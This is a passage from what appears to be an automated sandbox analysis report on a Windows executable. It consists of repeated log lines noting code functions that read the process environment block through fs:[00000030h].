          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F61E5 mov eax, dword ptr fs:[00000030h]0_2_010F61E5
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010501F8 mov eax, dword ptr fs:[00000030h]0_2_010501F8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A4000 mov ecx, dword ptr fs:[00000030h]0_2_010A4000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C2000 mov eax, dword ptr fs:[00000030h]0_2_010C2000
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E016 mov eax, dword ptr fs:[00000030h]0_2_0103E016
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A020 mov eax, dword ptr fs:[00000030h]0_2_0101A020
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C020 mov eax, dword ptr fs:[00000030h]0_2_0101C020
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6030 mov eax, dword ptr fs:[00000030h]0_2_010B6030
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022050 mov eax, dword ptr fs:[00000030h]0_2_01022050
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6050 mov eax, dword ptr fs:[00000030h]0_2_010A6050
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104C073 mov eax, dword ptr fs:[00000030h]0_2_0104C073
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102208A mov eax, dword ptr fs:[00000030h]0_2_0102208A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B80A8 mov eax, dword ptr fs:[00000030h]0_2_010B80A8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E60B8 mov eax, dword ptr fs:[00000030h]0_2_010E60B8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E60B8 mov ecx, dword ptr fs:[00000030h]0_2_010E60B8
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A20DE mov eax, dword ptr fs:[00000030h]0_2_010A20DE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0101A0E3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A60E0 mov eax, dword ptr fs:[00000030h]0_2_010A60E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010280E9 mov eax, dword ptr fs:[00000030h]0_2_010280E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C0F0 mov eax, dword ptr fs:[00000030h]0_2_0101C0F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010620F0 mov ecx, dword ptr fs:[00000030h]0_2_010620F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A30B mov eax, dword ptr fs:[00000030h]0_2_0105A30B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C310 mov ecx, dword ptr fs:[00000030h]0_2_0101C310
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01040310 mov ecx, dword ptr fs:[00000030h]0_2_01040310
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A2349 mov eax, dword ptr fs:[00000030h]0_2_010A2349
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov ecx, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A035C mov eax, dword ptr fs:[00000030h]0_2_010A035C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010EA352 mov eax, dword ptr fs:[00000030h]0_2_010EA352
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C8350 mov ecx, dword ptr fs:[00000030h]0_2_010C8350
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C437C mov eax, dword ptr fs:[00000030h]0_2_010C437C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E388 mov eax, dword ptr fs:[00000030h]0_2_0101E388
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104438F mov eax, dword ptr fs:[00000030h]0_2_0104438F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104438F mov eax, dword ptr fs:[00000030h]0_2_0104438F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01018397 mov eax, dword ptr fs:[00000030h]0_2_01018397
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DC3CD mov eax, dword ptr fs:[00000030h]0_2_010DC3CD
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A3C0 mov eax, dword ptr fs:[00000030h]0_2_0102A3C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010283C0 mov eax, dword ptr fs:[00000030h]0_2_010283C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A63C0 mov eax, dword ptr fs:[00000030h]0_2_010A63C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov ecx, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE3DB mov eax, dword ptr fs:[00000030h]0_2_010CE3DB
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C43D4 mov eax, dword ptr fs:[00000030h]0_2_010C43D4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C43D4 mov eax, dword ptr fs:[00000030h]0_2_010C43D4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010303E9 mov eax, dword ptr fs:[00000030h]0_2_010303E9
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103E3F0 mov eax, dword ptr fs:[00000030h]0_2_0103E3F0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010563FF mov eax, dword ptr fs:[00000030h]0_2_010563FF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101823B mov eax, dword ptr fs:[00000030h]0_2_0101823B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A8243 mov eax, dword ptr fs:[00000030h]0_2_010A8243
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A8243 mov ecx, dword ptr fs:[00000030h]0_2_010A8243
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A250 mov eax, dword ptr fs:[00000030h]0_2_0101A250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026259 mov eax, dword ptr fs:[00000030h]0_2_01026259
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA250 mov eax, dword ptr fs:[00000030h]0_2_010DA250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA250 mov eax, dword ptr fs:[00000030h]0_2_010DA250
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01024260 mov eax, dword ptr fs:[00000030h]0_2_01024260
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101826B mov eax, dword ptr fs:[00000030h]0_2_0101826B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D0274 mov eax, dword ptr fs:[00000030h]0_2_010D0274
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E284 mov eax, dword ptr fs:[00000030h]0_2_0105E284
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E284 mov eax, dword ptr fs:[00000030h]0_2_0105E284
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A0283 mov eax, dword ptr fs:[00000030h]0_2_010A0283
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302A0 mov eax, dword ptr fs:[00000030h]0_2_010302A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302A0 mov eax, dword ptr fs:[00000030h]0_2_010302A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov ecx, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B62A0 mov eax, dword ptr fs:[00000030h]0_2_010B62A0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6500 mov eax, dword ptr fs:[00000030h]0_2_010B6500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028550 mov eax, dword ptr fs:[00000030h]0_2_01028550
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028550 mov eax, dword ptr fs:[00000030h]0_2_01028550
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022582 mov eax, dword ptr fs:[00000030h]0_2_01022582
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022582 mov ecx, dword ptr fs:[00000030h]0_2_01022582
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01054588 mov eax, dword ptr fs:[00000030h]0_2_01054588
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E59C mov eax, dword ptr fs:[00000030h]0_2_0105E59C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010445B1 mov eax, dword ptr fs:[00000030h]0_2_010445B1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010445B1 mov eax, dword ptr fs:[00000030h]0_2_010445B1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E5CF mov eax, dword ptr fs:[00000030h]0_2_0105E5CF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E5CF mov eax, dword ptr fs:[00000030h]0_2_0105E5CF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010265D0 mov eax, dword ptr fs:[00000030h]0_2_010265D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A5D0 mov eax, dword ptr fs:[00000030h]0_2_0105A5D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A5D0 mov eax, dword ptr fs:[00000030h]0_2_0105A5D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010225E0 mov eax, dword ptr fs:[00000030h]0_2_010225E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C5ED mov eax, dword ptr fs:[00000030h]0_2_0105C5ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C5ED mov eax, dword ptr fs:[00000030h]0_2_0105C5ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C427 mov eax, dword ptr fs:[00000030h]0_2_0101C427
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
